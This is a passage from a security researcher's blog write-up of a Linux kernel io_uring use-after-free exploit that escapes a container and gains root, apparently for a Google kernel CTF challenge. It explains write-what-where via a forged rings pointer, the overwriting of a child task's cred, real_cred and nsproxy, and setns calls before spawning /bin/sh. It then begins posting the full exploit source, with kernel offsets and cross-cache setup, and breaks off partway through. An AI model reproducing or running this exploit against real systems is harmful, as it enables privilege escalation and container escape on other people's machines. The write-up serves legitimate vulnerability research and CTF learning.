    <span class="o">*</span><span class="n">cq_wait_ptr</span> <span class="o">=</span> <span class="n">real_cq_wait</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
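<p>The key line in that function is <code class="language-plaintext highlighter-rouge">*rings_ptr = where - 0xc0</code>: because the kernel adds the offset of <code class="language-plaintext highlighter-rouge">cq.tail</code> back on when it computes <code class="language-plaintext highlighter-rouge">&amp;ctx-&gt;rings-&gt;cq.tail</code>, the store lands exactly on <code class="language-plaintext highlighter-rouge">where</code>. Here is a minimal userspace model of that write-what-where. The <code class="language-plaintext highlighter-rouge">fake_ctx</code> type and both function names are hypothetical, and the only value taken from the exploit is the <code class="language-plaintext highlighter-rouge">0xc0</code> offset:</p>

```c
#include <stdint.h>
#include <string.h>

// Offset of cq.tail from the start of the rings object, per the exploit (0xc0)
#define CQ_TAIL_OFF 0xc0

// Hypothetical, stripped-down stand-in for the forged context
struct fake_ctx {
    uintptr_t rings;           // forged "rings" pointer
    uint32_t  cached_cq_tail;  // the 4 bytes we want written
};

// Bias the rings pointer so that rings + CQ_TAIL_OFF == where
static struct fake_ctx forge_ctx(void *where, uint32_t what)
{
    struct fake_ctx ctx;
    ctx.rings = (uintptr_t)where - CQ_TAIL_OFF;
    ctx.cached_cq_tail = what;
    return ctx;
}

// Models the 4-byte store the kernel performs when committing the ring:
// it adds the field offset back on and writes cached_cq_tail there
static void commit_cqring_model(const struct fake_ctx *ctx)
{
    void *tail = (void *)(ctx->rings + CQ_TAIL_OFF);
    memcpy(tail, &ctx->cached_cq_tail, sizeof(ctx->cached_cq_tail));
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">forge_ctx(&amp;victim, 0xdeadbeef)</code> followed by <code class="language-plaintext highlighter-rouge">commit_cqring_model</code> overwrites exactly the 4 bytes of <code class="language-plaintext highlighter-rouge">victim</code> and nothing around it.</p>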

<h3 id="performing-our-writes">Performing Our Writes</h3>
<p>Now, it’s time to do our writes. Remember those three sequential writes inside of <code class="language-plaintext highlighter-rouge">io_fill_cqe_aux</code> that we were going to use, but that I said wouldn’t work with the exploit plan? Well, the reason is that those three writes are as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">cqe</span> <span class="o">=</span> <span class="n">io_get_cqe</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">(</span><span class="n">cqe</span><span class="p">))</span> <span class="p">{</span>
		<span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">cqe</span><span class="o">-&gt;</span><span class="n">user_data</span><span class="p">,</span> <span class="n">user_data</span><span class="p">);</span>
		<span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">cqe</span><span class="o">-&gt;</span><span class="n">res</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span>
		<span class="n">WRITE_ONCE</span><span class="p">(</span><span class="n">cqe</span><span class="o">-&gt;</span><span class="n">flags</span><span class="p">,</span> <span class="n">cflags</span><span class="p">);</span>
</code></pre></div></div>

<p>They worked really well <em>until</em> I went to overwrite the <code class="language-plaintext highlighter-rouge">nsproxy</code> member of our target child <code class="language-plaintext highlighter-rouge">task_struct</code>. One of those writes inevitably overwrote the members right next to <code class="language-plaintext highlighter-rouge">nsproxy</code>: <code class="language-plaintext highlighter-rouge">signal</code> and <code class="language-plaintext highlighter-rouge">sighand</code>. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just use the 4-byte write inside <code class="language-plaintext highlighter-rouge">io_commit_cqring</code> instead. The 4-byte write also caused problems: at some points <code class="language-plaintext highlighter-rouge">current</code> has its creds checked, and since updating an 8-byte pointer with two 4-byte writes basically amounts to a torn 8-byte write, we would leave <code class="language-plaintext highlighter-rouge">current</code>’s cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.</p>
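<p>To see why the torn write is dangerous, here is a minimal sketch that models replacing an 8-byte pointer with two 4-byte writes, low half first, as it would look on little-endian x86-64. The helper names and the pointer values in the usage note are invented for illustration:</p>

```c
#include <stdint.h>

// Model a 4-byte store to the low half of an 8-byte slot
// (the lower address on little-endian x86-64)
static uint64_t write_low32(uint64_t slot, uint32_t what)
{
    return (slot & UINT64_C(0xffffffff00000000)) | (uint64_t)what;
}

// Model a 4-byte store to the high half of an 8-byte slot
static uint64_t write_high32(uint64_t slot, uint32_t what)
{
    return (slot & UINT64_C(0x00000000ffffffff)) | ((uint64_t)what << 32);
}

// Value the slot holds between the two writes: the new low half glued
// onto the old high half, which is neither the old nor the new pointer
static uint64_t torn_intermediate(uint64_t old_ptr, uint64_t new_ptr)
{
    return write_low32(old_ptr, (uint32_t)new_ptr);
}
```

<p>Going from an invented old pointer <code class="language-plaintext highlighter-rouge">0xffff888111112222</code> to a new one <code class="language-plaintext highlighter-rouge">0xffff8882aaaabbbb</code>, the slot briefly holds <code class="language-plaintext highlighter-rouge">0xffff8881aaaabbbb</code>. If the kernel dereferences the running task’s creds in that window, it follows a pointer to nowhere, which is why the writes target a sleeping child instead.</p>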

<p>Now we can just use those same steps to overwrite the three members <code class="language-plaintext highlighter-rouge">real_cred</code>, <code class="language-plaintext highlighter-rouge">cred</code>, and <code class="language-plaintext highlighter-rouge">nsproxy</code>, and now our child has all of the same privileges and capabilities that <code class="language-plaintext highlighter-rouge">init</code> does, including visibility into the host root file system. This is perfect, but I still wasn’t able to get the flag!</p>

<p>I started to panic at this point that I had seriously done something wrong. The exploit is FULL of paranoid checks: I reread every overwritten value to make sure it’s correct, for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered that in Andy Nguyen’s blog post, he used his <code class="language-plaintext highlighter-rouge">root</code> privileges to explicitly set his namespace values with calls to <code class="language-plaintext highlighter-rouge">setns</code>. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as <code class="language-plaintext highlighter-rouge">init</code>, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how <code class="language-plaintext highlighter-rouge">setns</code> is implemented, but this could probably be done without explicit <code class="language-plaintext highlighter-rouge">setns</code> calls and only with our read and write tools:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Our child waits to be given super powers and then drops into shell</span>
<span class="kt">void</span> <span class="nf">child_exec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Change our taskname </span>
    <span class="k">if</span> <span class="p">(</span><span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_NAME</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`prctl()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">g_shmem</span> <span class="o">==</span> <span class="mh">0x1337</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">sleep</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
            <span class="n">info</span><span class="p">(</span><span class="s">"Child dropping into root shell..."</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/mnt"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/pid"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/net"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="kt">char</span> <span class="o">*</span><span class="n">args</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">};</span>
            <span class="n">execve</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">args</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="k">else</span> <span class="p">{</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And finally I was able to drop into a <code class="language-plaintext highlighter-rouge">root</code> shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal: I had some out-of-band confirmation/paranoia checks I had to leave out, but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux, unlike most of the other <code class="language-plaintext highlighter-rouge">fcntl</code> syscall flags. Remember, at that point we don’t know enough information to fake any objects in memory, so I’d be dead in the water if that read method was ruined by SELinux.</p>

<h2 id="conclusion">Conclusion</h2>
<p>This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also <a href="https://twitter.com/chompie1337">@chompie1337</a> who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Compile</span>
<span class="c1">// gcc sploit.c -o sploit -l:liburing.a -static -Wall</span>

<span class="cp">#define _GNU_SOURCE
#include</span> <span class="cpf">&lt;sched.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdarg.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/time.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/resource.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/msg.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/timerfd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/prctl.h&gt;</span><span class="cp">
</span>
<span class="cp">#include</span> <span class="cpf">"liburing.h"</span><span class="cp">
</span>
<span class="c1">// /sys/kernel/slab/filp/objs_per_slab</span>
<span class="cp">#define OBJS_PER_SLAB 16UL
</span><span class="c1">// /sys/kernel/slab/filp/cpu_partial</span>
<span class="cp">#define CPU_PARTIAL 52UL
</span><span class="c1">// Multiplier for cross-cache arithmetic</span>
<span class="cp">#define OVERFLOW_FACTOR 2UL
</span><span class="c1">// Largest number of objects we could allocate per Cross-cache step</span>
<span class="cp">#define CROSS_CACHE_MAX 8192UL
</span><span class="c1">// Fixed mapping in cpu_entry_area whose contents are NULL</span>
<span class="cp">#define NULL_MEM 0xfffffe0000002000UL
</span><span class="c1">// Reading side of pipe</span>
<span class="cp">#define PIPE_READ 0
</span><span class="c1">// Writing side of pipe</span>
<span class="cp">#define PIPE_WRITE 1
</span><span class="c1">// Address inside cpu_entry_area that holds an error_entry pointer</span>
<span class="cp">#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
</span><span class="c1">// Offset from `error_entry` pointer to kernel base</span>
<span class="cp">#define EE_OFF 0xe0124dUL
</span><span class="c1">// Kernel text signature</span>
<span class="cp">#define KERNEL_SIGNATURE 0x4801803f51258d48UL
</span><span class="c1">// Offset from kernel base to init_task</span>
<span class="cp">#define INIT_OFF 0x18149c0UL
</span><span class="c1">// Offset from task to task-&gt;comm</span>
<span class="cp">#define COMM_OFF 0x738UL
</span><span class="c1">// Offset from task to task-&gt;real_cred</span>
<span class="cp">#define REAL_CRED_OFF 0x720UL
</span><span class="c1">// Offset from task to task-&gt;cred</span>
<span class="cp">#define CRED_OFF 0x728UL
</span><span class="c1">// Offset from task to task-&gt;nsproxy</span>
<span class="cp">#define NSPROXY_OFF 0x780UL
</span><span class="c1">// Offset from task to task-&gt;files</span>
<span class="cp">#define FILES_OFF 0x770UL
</span><span class="c1">// Offset from task-&gt;files to &amp;task-&gt;files-&gt;fdt</span>
<span class="cp">#define FDT_OFF 0x20UL
</span><span class="c1">// Offset from &amp;task-&gt;files-&gt;fdt to &amp;task-&gt;files-&gt;fdt-&gt;fd</span>
<span class="cp">#define FD_ARRAY_OFF 0x8UL
</span><span class="c1">// Offset from task to task-&gt;tasks.next</span>
<span class="cp">#define TASKS_NEXT_OFF 0x458UL
</span><span class="c1">// Process name to give root creds to </span>
<span class="cp">#define TARGET_TASK "blegh2"
</span><span class="c1">// Our process name</span>
<span class="cp">#define OUR_TASK "blegh1"
</span><span class="c1">// Offset from kernel base to io_uring_fops</span>
<span class="cp">#define FOPS_OFF 0x1220200UL
</span>
<span class="c1">// Shared memory with child</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">g_shmem</span><span class="p">;</span>

<span class="c1">// Child pid</span>
<span class="n">pid_t</span> <span class="n">g_child</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

<span class="c1">// io_uring instance to use</span>
<span class="k">struct</span> <span class="n">io_uring</span> <span class="n">g_ring</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// UAF file handle</span>
<span class="kt">int</span> <span class="n">g_uaf_fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

<span class="c1">// Track pipes</span>
<span class="k">struct</span> <span class="n">fd_pair</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">fd_pair</span> <span class="n">g_pipe</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// The offset on the page where our `file` is</span>
<span class="kt">size_t</span> <span class="n">g_off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Our fake file that is a copy of a legit io_uring fd</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">g_ring_copy</span><span class="p">[</span><span class="mi">256</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// Keep track of files added in Cross-cache steps</span>
<span class="kt">int</span> <span class="n">g_cc1_fds</span><span class="p">[</span><span class="n">CROSS_CACHE_MAX</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="kt">size_t</span> <span class="n">g_cc1_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">g_cc2_fds</span><span class="p">[</span><span class="n">CROSS_CACHE_MAX</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="kt">size_t</span> <span class="n">g_cc2_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">g_cc3_fds</span><span class="p">[</span><span class="n">CROSS_CACHE_MAX</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="kt">size_t</span> <span class="n">g_cc3_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Gadgets and offsets</span>
<span class="kt">uint64_t</span> <span class="n">g_kern_base</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_init_task</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_target_task</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_our_task</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_cred_what</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_nsproxy_what</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_cred_where</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_real_cred_where</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_nsproxy_where</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_files</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_fdt</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_file_array</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_file_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_pipe_buf</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_scratch</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_fops</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="kt">void</span> <span class="nf">err</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">format</span><span class="p">,</span> <span class="p">...)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">format</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"[!] "</span><span class="p">);</span>
    <span class="kt">va_list</span> <span class="n">args</span><span class="p">;</span>
    <span class="n">va_start</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">format</span><span class="p">);</span>
    <span class="n">vfprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
    <span class="n">va_end</span><span class="p">(</span><span class="n">args</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">": %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>

    <span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">info</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">format</span><span class="p">,</span> <span class="p">...)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">format</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"[*] "</span><span class="p">);</span>
    <span class="kt">va_list</span> <span class="n">args</span><span class="p">;</span>
    <span class="n">va_start</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">format</span><span class="p">);</span>
    <span class="n">vfprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
    <span class="n">va_end</span><span class="p">(</span><span class="n">args</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Get FD for test file</span>
<span class="kt">int</span> <span class="nf">get_test_fd</span><span class="p">(</span><span class="kt">int</span> <span class="n">victim</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// These are just different for kernel debugging purposes</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">file</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">victim</span><span class="p">)</span> <span class="p">{</span> <span class="n">file</span> <span class="o">=</span> <span class="s">"/etc//passwd"</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span> <span class="n">file</span> <span class="o">=</span> <span class="s">"/etc/passwd"</span><span class="p">;</span> <span class="p">}</span>

    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`open()` failed, file: %s"</span><span class="p">,</span> <span class="n">file</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">fd</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Set-up the file that we're going to use as our victim object</span>
<span class="kt">void</span> <span class="nf">alloc_victim_filp</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Open file to register</span>
    <span class="n">g_uaf_fd</span> <span class="o">=</span> <span class="n">get_test_fd</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Victim fd: %d"</span><span class="p">,</span> <span class="n">g_uaf_fd</span><span class="p">);</span>

    <span class="c1">// Register the file</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_register_files</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g_uaf_fd</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_register_files()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Get hold of the sqe</span>
    <span class="k">struct</span> <span class="n">io_uring_sqe</span> <span class="o">*</span><span class="n">sqe</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">sqe</span> <span class="o">=</span> <span class="n">io_uring_get_sqe</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">sqe</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_get_sqe()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init sqe vals</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">opcode</span> <span class="o">=</span> <span class="n">IORING_OP_MSG_RING</span><span class="p">;</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">fd</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">IOSQE_FIXED_FILE</span><span class="p">;</span>

    <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_submit</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_submit()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">struct</span> <span class="n">io_uring_cqe</span> <span class="o">*</span><span class="n">cqe</span><span class="p">;</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_wait_cqe</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">cqe</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Set CPU affinity for calling process/thread</span>
<span class="kt">void</span> <span class="nf">pin_cpu</span><span class="p">(</span><span class="kt">long</span> <span class="n">cpu_id</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">cpu_set_t</span> <span class="n">mask</span><span class="p">;</span>
    <span class="n">CPU_ZERO</span><span class="p">(</span><span class="o">&amp;</span><span class="n">mask</span><span class="p">);</span>
    <span class="n">CPU_SET</span><span class="p">(</span><span class="n">cpu_id</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">mask</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">sched_setaffinity</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">mask</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">mask</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`sched_setaffinity()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Increase the number of FDs we can have open</span>
<span class="kt">void</span> <span class="nf">increase_fds</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">rlimit</span> <span class="n">old_lim</span><span class="p">,</span> <span class="n">lim</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">getrlimit</span><span class="p">(</span><span class="n">RLIMIT_NOFILE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">old_lim</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`getrlimit()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">lim</span><span class="p">.</span><span class="n">rlim_cur</span> <span class="o">=</span> <span class="n">old_lim</span><span class="p">.</span><span class="n">rlim_max</span><span class="p">;</span>
    <span class="n">lim</span><span class="p">.</span><span class="n">rlim_max</span> <span class="o">=</span> <span class="n">old_lim</span><span class="p">.</span><span class="n">rlim_max</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">RLIMIT_NOFILE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">lim</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`setrlimit()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// rlim_t is not an int, so cast and print as unsigned long</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Increased fd limit from %lu to %lu"</span><span class="p">,</span>
        <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">old_lim</span><span class="p">.</span><span class="n">rlim_cur</span><span class="p">,</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">lim</span><span class="p">.</span><span class="n">rlim_cur</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">create_pipe</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pipe</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`pipe()` failed"</span><span class="p">);</span>
